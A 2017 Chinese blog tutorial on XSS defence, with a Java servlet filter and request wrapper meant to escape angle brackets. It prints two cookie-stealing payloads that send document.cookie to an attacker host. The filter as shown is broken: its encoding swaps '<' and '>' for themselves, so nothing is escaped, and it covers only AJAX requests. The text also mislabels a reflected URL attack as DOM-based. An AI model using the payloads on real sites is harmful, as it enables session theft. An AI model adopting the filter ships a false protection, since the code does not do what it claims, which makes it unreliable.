xss防御

作者 江辉 日期 2017-04-14
xss防御

一. Dom-Based XSS 漏洞攻击

危险系数:低

http://victim.com/search.asp?term=<script>window.open("http://badguy.com?cookie="+document.cookie)</script>

上面这个例子就是典型的based攻击,当黑客发送了一个链接给受害者,受害者点击了这个链接,这样黑客就能在自己搭建的服务里获取受害者的cookie信息。

分析:

现在的主流浏览器已经默认自带并开启了对于XSS(Cross Site Scripting)攻击的防护。所以这种类型的攻击危险系数低,且只要用户不要点击非官方发来的危险链接借可以避免信息被盗。

二.Stored XSS(存储式XSS漏洞)

危险系数:高,危害大,危害人数多

Alex发现了网站A上有一个XSS 漏洞,该漏洞允许将攻击代码保存在数据库中,Alex发布了一篇文章,文章中嵌入了恶意JavaScript代码。其他人如Monica访问这片文章的时候,嵌入在文章中的恶意Javascript代码就会在Monica的浏览器中执行,其会话cookie或者其他信息将被Alex盗走。

黑客注册一个某网站的账号,然后自己去申请融资,在备注一栏目填写了

<script>window.open('http://黑客自己搭建的一个项目地址?cookie=document.cookie')</script>

填完以后后台人员在不知情的情况下去审核,这个时候就会触发这个事件,后台人员的cookie就会被盗取。

三.防御措施

主要针对的是java 的防御措施,也可以通过购买web 防火墙解决

  • 1.在web.xml中定义一个fiter 过滤请求

    <filter>
    <filter-name>XssEscape</filter-name>
    <filter-class>com.jlfex.common.servlet.XssFilter</filter-class>
    </filter>
    <filter-mapping>
    <filter-name>XssEscape</filter-name>
    <url-pattern>/*</url-pattern>
    </filter-mapping>
  • 2.XssFlter.java

package com.jlfex.common.servlet;
import org.apache.commons.lang3.StringUtils;
import javax.servlet.*;
import javax.servlet.http.HttpServletRequest;
import java.io.IOException;
/**
* User: PC
* Date: 2017/4/5 14:16
*/
public class XssFilter implements Filter {
@Override
public void init(FilterConfig filterConfig) throws ServletException {
//
}
@Override
public void doFilter(ServletRequest request, ServletResponse response, FilterChain chain) throws IOException, ServletException {
String requestType =(String) ((HttpServletRequest)request).getHeader("X-Requested-With");
//针对ajax的异步请求防止xss攻击
if(StringUtils.isNotEmpty(requestType) && requestType.equals("XMLHttpRequest")){
XssHttpServletRequestWrapper xssRequest = new XssHttpServletRequestWrapper(
(HttpServletRequest) request);
String content = (String) request.getAttribute("content");
chain.doFilter(xssRequest, response);
}else{
chain.doFilter(request, response);
}
}
@Override
public void destroy() {
//
}
}
package com.jlfex.common.servlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletRequestWrapper;
/**
* User: PC
* Date: 2017/4/5 14:19
*/
public class XssHttpServletRequestWrapper extends HttpServletRequestWrapper {
HttpServletRequest orgRequest = null;
/**
* Constructs a request object wrapping the given request.
*
* @param request
* @throws IllegalArgumentException if the request is null
*/
public XssHttpServletRequestWrapper(HttpServletRequest request) {
super(request);
orgRequest = request;
}
public String getParameter(String name) {
String value = super.getParameter(xssEncode(name));
if (value != null) {
value = xssEncode(value);
}
return value;
}
public String[] getParameterValues(String name) {
String[] results = super.getParameterValues(xssEncode(name));
if(results == null || results.length <= 0)
return null;
else{
int length = results.length;
for(int i=0;i<length;i++){
results[i] = xssEncode(results[i]);
}
return results;
}
}
public String getHeader(String name) {
String value = super.getHeader(xssEncode(name));
if (value != null) {
value = xssEncode(value);
}
return value;
}
private static String xssEncode(String s) {
if (s == null || s.isEmpty()) {
return s;
}
StringBuilder sb = new StringBuilder(s.length() + 16);
for (int i = 0; i < s.length(); i++) {
char c = s.charAt(i);
switch (c) {
case '>':
sb.append('>');//全角大于号
break;
case '<':
sb.append('<');//全角小于号
break;
default:
sb.append(c);
break;
}
}
return sb.toString();
}
public HttpServletRequest getOrgRequest() {
return orgRequest;
}
public static HttpServletRequest getOrgRequest(HttpServletRequest req) {
if(req instanceof XssHttpServletRequestWrapper){
return ((XssHttpServletRequestWrapper)req).getOrgRequest();
}
return req;
}
}
​`

```